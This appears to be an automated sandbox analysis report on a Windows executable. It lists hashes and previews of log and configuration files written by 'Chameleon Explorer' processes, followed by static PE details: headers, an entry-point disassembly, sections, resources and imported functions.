                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.[0]..Path=C:\Users\user\Desktop..Caption=Desktop..ItemType=0..GroupIndex=0....[1]..Path=C:\Users\user\Downloads..Caption=Downloads..ItemType=0..GroupIndex=0....[2]..Path=C:\Users\user\Documents..Caption=Documents..ItemType=0..GroupIndex=0....[3]..Path=C:\Users\user\Pictures..Caption=Pictures..ItemType=0..GroupIndex=0....[4]..Path=C:\Users\user\Music..Caption=Music..ItemType=0..GroupIndex=0....[5]..Path=C:\Users\user\Videos..Caption=Videos..ItemType=0..GroupIndex=0....[6]..Path=Libraries..Caption=Libraries..ItemType=0..GroupIndex=0....[7]..Path=Recycle Bin..Caption=Recycle Bin..ItemType=0..GroupIndex=0....[8]..Path=..Caption=This PC..ItemType=0..GroupIndex=0....[9]..Path=C:..Caption=Local Disk (C:)..ItemType=0..GroupIndex=0....[10]..Path=D:..Caption=DVD Drive (D:)..ItemType=0..GroupIndex=0....[11]..Path=c:\windows\notepad.exe..Caption=Notepad..ItemType=0..GroupIndex=0....[12]..Path=c:\windows\System32\calc.exe..Caption=Calculator..ItemType=0..GroupIndex=0....[IntegrityCheckingS

                                                                                                                                      C:\Users\user\Documents\Chameleon files\Folder configuration\favorites.ini.temp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1029
                                                                                                                                      Entropy (8bit):5.073046635157514
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ilPKE3YE39E3IE3ZE3nVmxE3vxE36TpE3laNE3RE3zE3ZjxE3Fg9lKE34G:eSFIt4kVciz+aNoeABMjG
                                                                                                                                      MD5:F5561BEACF73E8F22AE653BCB64E2E75
                                                                                                                                      SHA1:7E2040EA37E77A593B16F66131958C9BC39B14F5
                                                                                                                                      SHA-256:DD3B1B6E081034B6EA7B43FA7BCD2E008F7228A89014ECF8465863ADB8C04CD3
                                                                                                                                      SHA-512:96F65778464684030AA2A31422EE7A5CC4683C6C975DB600C4CFEBD5B9ED8CC1B9213F07A2B3EBBDB73868C44CCE027999C6CC6B61AFD30864434E741D38EF4F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.[0]..Path=C:\Users\user\Desktop..Caption=Desktop..ItemType=0..GroupIndex=0....[1]..Path=C:\Users\user\Downloads..Caption=Downloads..ItemType=0..GroupIndex=0....[2]..Path=C:\Users\user\Documents..Caption=Documents..ItemType=0..GroupIndex=0....[3]..Path=C:\Users\user\Pictures..Caption=Pictures..ItemType=0..GroupIndex=0....[4]..Path=C:\Users\user\Music..Caption=Music..ItemType=0..GroupIndex=0....[5]..Path=C:\Users\user\Videos..Caption=Videos..ItemType=0..GroupIndex=0....[6]..Path=Libraries..Caption=Libraries..ItemType=0..GroupIndex=0....[7]..Path=Recycle Bin..Caption=Recycle Bin..ItemType=0..GroupIndex=0....[8]..Path=..Caption=This PC..ItemType=0..GroupIndex=0....[9]..Path=C:..Caption=Local Disk (C:)..ItemType=0..GroupIndex=0....[10]..Path=D:..Caption=DVD Drive (D:)..ItemType=0..GroupIndex=0....[11]..Path=c:\windows\notepad.exe..Caption=Notepad..ItemType=0..GroupIndex=0....[12]..Path=c:\windows\System32\calc.exe..Caption=Calculator..ItemType=0..GroupIndex=0....[IntegrityCheckingS

                                                                                                                                      C:\Users\user\Documents\Chameleon files\Log\explorer.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):288
                                                                                                                                      Entropy (8bit):3.3878200727856553
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:QS4lulC+Sk2lAmEoclcoalulC+Sk2lAmEoclcSYloUrMJ2wlw:QArqjEoctrqjEocNUQJbw
                                                                                                                                      MD5:788B4E2858A3B93491324C1F07EBD67F
                                                                                                                                      SHA1:391D669F1CC143E639379333FBA482DDFEE3D0B6
                                                                                                                                      SHA-256:BACD4610EC7AA70AFA2F49918C7C4D6FF5759BEC389C69BCD8C3ACB355E5E515
                                                                                                                                      SHA-512:DC42DBD51C763BAA27811FF6412DBB546652D6A4419D5946E1DB852DA1366AACBB8C7E88A6B7CD46B8424F830FDFD4E66AF12B937FFFB9457848CFB40B3B843A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..8.:.0.9.:.0.8. .A.M. .:. .I.m.p.o.r.t.W.i.n.d.o.w.s.S.e.t.t.i.n.g.s. .P.A.R.A.M.S.:. .b.e.g.i.n.....8.:.0.8.:.4.9. .A.M. .:. .I.m.p.o.r.t.W.i.n.d.o.w.s.S.e.t.t.i.n.g.s. .P.A.R.A.M.S.:. .b.e.g.i.n.....8.:.0.9.:.0.6. .A.M. .:. .F.o.l.d.e.r.I.n.i.t. .P.A.R.A.M.S.:. .S.e.t.H.o.o.k.........

                                                                                                                                      C:\Users\user\Documents\Chameleon files\Log\folder.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):8194
                                                                                                                                      Entropy (8bit):3.6321159563727923
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:YOX1UqlrOAo4oKLtaaaaaaiaISgVWHpLo:bW9
                                                                                                                                      MD5:EC1CF0F190E6728DA95AB1DBE6A93374
                                                                                                                                      SHA1:19BC26774E10E9340A9FDD29188E9E18CE3A1375
                                                                                                                                      SHA-256:E51205743E68B14B59AA74652810B63E04B5ABCCF9B9CFF1CD53EEABAD3294EF
                                                                                                                                      SHA-512:DC08717BE83DA8635B718FC8A73EEC8257B3CA3967E193D1BD286C480156F3E0285F202624D43D872A4C62287113811DC54557892B1695AFDF6DC7871BC67905
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..8.:.0.8.:.4.4. .A.M. .:. .D.e.l.e.t.e.F.r.o.m.S.c.h.e.d.u.l.e.r. .P.A.R.A.M.S.:. .D.e.l.e.t.e.T.a.s.k. .f.a.i.l. .C.h.a.m.e.l.e.o.n. .F.o.l.d.e.r.-.h.a.r.d.z.....8.:.0.8.:.4.4. .A.M. .:. .L.a.u.n.c.h.T.h.r.o.u.g.h.S.c.h.e.d.u.l.e.r. .P.A.R.A.M.S.:. .S.t.a.r.t.....8.:.0.8.:.4.4. .A.M. .:. .L.a.u.n.c.h.T.h.r.o.u.g.h.S.c.h.e.d.u.l.e.r. .P.A.R.A.M.S.:. .I.s.N.e.w.=.C.h.a.m.e.l.e.o.n. .F.o.l.d.e.r.-.h.a.r.d.z.....8.:.0.8.:.4.6. .A.M. .:. .T.r.y.S.c.h.e.d.u.l.e.r.S.t.a.r.t. .P.A.R.A.M.S.:. .A.l.r.e.a.d.y. .e.v.a.l.u.a.t.e.d.....8.:.0.8.:.4.9. .A.M. .:. .F.o.l.d.e.r.I.n.i.t. .P.A.R.A.M.S.:. .S.e.t.H.o.o.k.....8.:.0.8.:.5.2. .A.M. .:. .A.d.d. .P.A.R.A.M.S.:. .D.i.s.p.l.a.y.P.a.t.h.=.D.e.s.k.t.o.p.....8.:.0.8.:.5.2. .A.M. .:. .A.d.d. .P.A.R.A.M.S.:. .D.i.s.p.l.a.y.N.a.m.e.=.D.e.s.k.t.o.p.....8.:.0.8.:.5.2. .A.M. .:. .A.d.d. .P.A.R.A.M.S.:. .N.a.m.e.=.D.e.s.k.t.o.p.....8.:.0.8.:.5.2. .A.M. .:. .A.d.d. .P.A.R.A.M.S.:. .P.a.t.h.=.C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.D.e.s.k.t.o.p.....8.:.0.8.:.5.2. .A.

                                                                                                                                      C:\Users\user\Documents\Chameleon files\Log\folder_error.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):50904
                                                                                                                                      Entropy (8bit):3.66453863264879
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:JbbAHcu7bbAHcuubbAHcuxbbAHcuCbbAHcuRbbAHcuobbAHcuNbbAHcu5bbAHcuB:JbbAHcu7bbAHcuubbAHcuxbbAHcuCbbB
                                                                                                                                      MD5:3CB71EFDF11307DF2C8A6D6D8D2012AF
                                                                                                                                      SHA1:6645EE91BA2475F7C3A5204D86F3FB1575DE4A97
                                                                                                                                      SHA-256:F691E143E5D22F123EE1C5658D7241FF2BB4D731216FB1DFE6CBB70306BD9542
                                                                                                                                      SHA-512:2FEAA74A89EB6062E966661EC3AE1BFF274E253779B4DD9E818B740CCFD31A5CDFF20E564C532AF1955A03D976D5ABC7F9883609C73BC29E7EBC551BE42AB568
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..2./.2.2./.2.0.2.3. .8.:.0.8.:.5.2. .A.M.:. .E.R.R.O.R. .(.).:. .G.e.t.F.o.l.d.e.r.E.x.p.l.o.r.e.r.H.a.n.d.l.e. .M.E.S.S.:. .R.e.s.u.l.t. .e.m.p.t.y.....L.a.s.t. .s.y.s.t.e.m. .e.r.r.o.r.:. .T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y. .(.0.).....C.o.m.p.i.l.e.T.i.m.e.:. .2.4.-.1.2.-.2.0.1.6. .1.4.-.1.7.....T.e.r.m.i.n.a.t.e.d.:. .F.a.l.s.e.....I.s.P.r.o.g.r.a.m.T.e.r.m.i.n.a.t.e.d.:. .F.a.l.s.e.....P.r.o.d.u.c.t.:. .W.i.n.d.o.w.s. .1.0. .P.r.o.....S.e.r.v.i.c.e. .P.a.c.k.:. .....B.u.i.l.d.:. .0.....V.e.r.s.i.o.n.:. .6.4.-.b.i.t.....U.A.C.:. .e.n.a.b.l.e.d.....U.A.C.:. .e.l.e.v.a.t.e.d.....T.o.t.a.l.P.h.y.s.i.c.a.l.M.e.m.o.r.y.:. .8.1.9.1.....P.h.y.s.i.c.a.l.M.e.m.o.r.y.L.o.a.d.:. .6.7.....S.w.a.p.F.i.l.e.S.i.z.e.:. .1.3.5.3.....S.w.a.p.F.i.l.e.U.s.a.g.e.:. .1.7.....M.o.n.i.t.o.r. .0.:. .L.:. .0. .T.:. .0. .W.:. .1.2.8.0. .H.:. .1.0.2.4. .I.s.M.a.i.n.:. .1. .W.L.:. .W.T.:. .0. .0. .W.R.:. .0. .W.B.:. .4.0.....C.h.a.m.e.l.e.o.n.E.x.p.l.o.r.e.r...e.x.e. .1.2.

                                                                                                                                      Static File Info

                                                                                                                                      General

                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Entropy (8bit):7.958481869612443
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                      File name:B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                                                                                                                                      File size:8148480
                                                                                                                                      MD5:894fce964d09231b2b271fbf5afd4806
                                                                                                                                      SHA1:bf0c85400eef6e222b41eed1f02345c6b00c1dfa
                                                                                                                                      SHA256:b7cfd1d0aad8b5d5db5c17da0519b1d18ec7663699f2b8fedd0628e2bfacb6e5
                                                                                                                                      SHA512:29eff9314c3425ecfcca16f608748d27d5f327fa3f029be9c5d0643977ce33b118a5201dac1921417121eee628b21629ce15d99c7bf002772d6472e57c60254f
                                                                                                                                      SSDEEP:196608:wCKG8hIdB4LC4BgRexpA4O1Xq7pZIBVIAg26FsluEMC/WpsvkCesIGf:TYo4m4iwg/qfDLKEC/WSvkCeH
                                                                                                                                      TLSH:AE862312B7E28031FFA7A2739B66F64546BC7D258123962F13581C7DBC741A2263E363
                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                                                                                                                      File Icon

                                                                                                                                      Icon Hash:aab2e3e39383aa00

                                                                                                                                      Static PE Info

                                                                                                                                      General

                                                                                                                                      Entrypoint:0x42800a
                                                                                                                                      Entrypoint Section:.text
                                                                                                                                      Digitally signed:false
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                      Time Stamp:0x5BAE46BA [Fri Sep 28 15:20:26 2018 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:
                                                                                                                                      OS Version Major:5
                                                                                                                                      OS Version Minor:1
                                                                                                                                      File Version Major:5
                                                                                                                                      File Version Minor:1
                                                                                                                                      Subsystem Version Major:5
                                                                                                                                      Subsystem Version Minor:1
                                                                                                                                      Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                                                                                      Entrypoint Preview

                                                                                                                                      Instruction
                                                                                                                                      call 00007FD174F52B6Dh
                                                                                                                                      jmp 00007FD174F45924h
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      push edi
                                                                                                                                      push esi
                                                                                                                                      mov esi, dword ptr [esp+10h]
                                                                                                                                      mov ecx, dword ptr [esp+14h]
                                                                                                                                      mov edi, dword ptr [esp+0Ch]
                                                                                                                                      mov eax, ecx
                                                                                                                                      mov edx, ecx
                                                                                                                                      add eax, esi
                                                                                                                                      cmp edi, esi
                                                                                                                                      jbe 00007FD174F45AAAh
                                                                                                                                      cmp edi, eax
                                                                                                                                      jc 00007FD174F45E0Eh
                                                                                                                                      bt dword ptr [004C41FCh], 01h
                                                                                                                                      jnc 00007FD174F45AA9h
                                                                                                                                      rep movsb
                                                                                                                                      jmp 00007FD174F45DBCh
                                                                                                                                      cmp ecx, 00000080h
                                                                                                                                      jc 00007FD174F45C74h
                                                                                                                                      mov eax, edi
                                                                                                                                      xor eax, esi
                                                                                                                                      test eax, 0000000Fh
                                                                                                                                      jne 00007FD174F45AB0h
                                                                                                                                      bt dword ptr [004BF324h], 01h
                                                                                                                                      jc 00007FD174F45F80h
                                                                                                                                      bt dword ptr [004C41FCh], 00000000h
                                                                                                                                      jnc 00007FD174F45C4Dh
                                                                                                                                      test edi, 00000003h
                                                                                                                                      jne 00007FD174F45C5Eh
                                                                                                                                      test esi, 00000003h
                                                                                                                                      jne 00007FD174F45C3Dh
                                                                                                                                      bt edi, 02h
                                                                                                                                      jnc 00007FD174F45AAFh
                                                                                                                                      mov eax, dword ptr [esi]
                                                                                                                                      sub ecx, 04h
                                                                                                                                      lea esi, dword ptr [esi+04h]
                                                                                                                                      mov dword ptr [edi], eax
                                                                                                                                      lea edi, dword ptr [edi+04h]
                                                                                                                                      bt edi, 03h
                                                                                                                                      jnc 00007FD174F45AB3h
                                                                                                                                      movq xmm1, qword ptr [esi]
                                                                                                                                      sub ecx, 08h
                                                                                                                                      lea esi, dword ptr [esi+08h]
                                                                                                                                      movq qword ptr [edi], xmm1
                                                                                                                                      lea edi, dword ptr [edi+08h]
                                                                                                                                      test esi, 00000007h
                                                                                                                                      je 00007FD174F45B05h
                                                                                                                                      bt esi, 03h

                                                                                                                                      Rich Headers

                                                                                                                                      Programming Language:
                                                                                                                                      • [ASM] VS2013 build 21005
                                                                                                                                      • [ C ] VS2013 build 21005
                                                                                                                                      • [C++] VS2013 build 21005
                                                                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                                                      • [ASM] VS2013 UPD5 build 40629
                                                                                                                                      • [RES] VS2013 build 21005
                                                                                                                                      • [LNK] VS2013 UPD5 build 40629

                                                                                                                                      Data Directories

                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x6faf2c.rsrc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x7c30000x7134.reloc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                      Sections

                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                      .text0x10000x8dfdd0x8e000False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                      .rdata0x8f0000x2fd8e0x2fe00False0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                      .data0xbf0000x8f740x5200False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .rsrc0xc80000x6faf2c0x6fb000unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                      .reloc0x7c30000x71340x7200False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                      Resources

                                                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                                                      RT_ICON0xc84a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain
                                                                                                                                      RT_ICON0xc85c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain
                                                                                                                                      RT_ICON0xc88b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain
                                                                                                                                      RT_ICON0xc89d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain
                                                                                                                                      RT_ICON0xc98800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain
                                                                                                                                      RT_ICON0xca1280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain
                                                                                                                                      RT_ICON0xca6900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain
                                                                                                                                      RT_ICON0xccc380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain
                                                                                                                                      RT_ICON0xcdce00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain
                                                                                                                                      RT_STRING0xce1480x594dataEnglishGreat Britain
                                                                                                                                      RT_STRING0xce6dc0x68adataEnglishGreat Britain
                                                                                                                                      RT_STRING0xced680x490dataEnglishGreat Britain
                                                                                                                                      RT_STRING0xcf1f80x5fcdataEnglishGreat Britain
                                                                                                                                      RT_STRING0xcf7f40x65cdataEnglishGreat Britain
                                                                                                                                      RT_STRING0xcfe500x466dataEnglishGreat Britain
                                                                                                                                      RT_STRING0xd02b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain
                                                                                                                                      RT_RCDATA0xd04100x6f25c2data
                                                                                                                                      RT_GROUP_ICON0x7c29d40x76dataEnglishGreat Britain
                                                                                                                                      RT_GROUP_ICON0x7c2a4c0x14dataEnglishGreat Britain
                                                                                                                                      RT_VERSION0x7c2a600xdcdataEnglishGreat Britain
                                                                                                                                      RT_MANIFEST0x7c2b3c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain

                                                                                                                                      Imports

                                                                                                                                      DLLImport
                                                                                                                                      WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                                                                      VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                      COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                                                      MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                                                      WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                                                                      PSAPI.DLLGetProcessMemoryInfo
                                                                                                                                      IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                                      USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                                                      UxTheme.dllIsThemeActive
                                                                                                                                      KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                                                                      USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                                                                      GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                                                                      COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
